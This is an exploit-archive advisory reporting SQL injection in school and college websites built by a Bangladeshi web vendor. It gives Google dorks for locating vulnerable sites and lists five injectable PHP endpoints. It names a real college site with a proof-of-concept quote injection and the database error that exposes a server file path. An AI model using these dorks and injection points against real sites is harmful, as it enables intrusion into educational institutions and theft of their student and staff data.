################################################################################################# # Exploit Title : Design & Developed By Target Soft Bangladesh SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 05/09/2018 # Vendor Homepage : targetsoftbd.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dorks : intext:''All contents copyright © 2015 . All rights reserved Design & Develope By : Target Soft'' intext:Design & Develope By : Target Soft'' site:edu.bd intext:Design & Developed By : Target Soft'' site:edu.bd # Exploits : /view_notices.php?id=[SQL Injection] /view_page.php?id=[SQL Injection] /view_teacher.php?id=[SQL Injection] /view_stuccess_st.php?id=[SQL Injection] /view_management.php?id=[SQL Injection] ################################################################################################# # Example Site => dhakaoxfordintcollege.edu.bd/view_notices.php?id=40%27 => [ Proof of Concept ] => archive.is/Fh7Ni # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/dhakaoxfordintco/public_html/view_notices.php on line 25 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################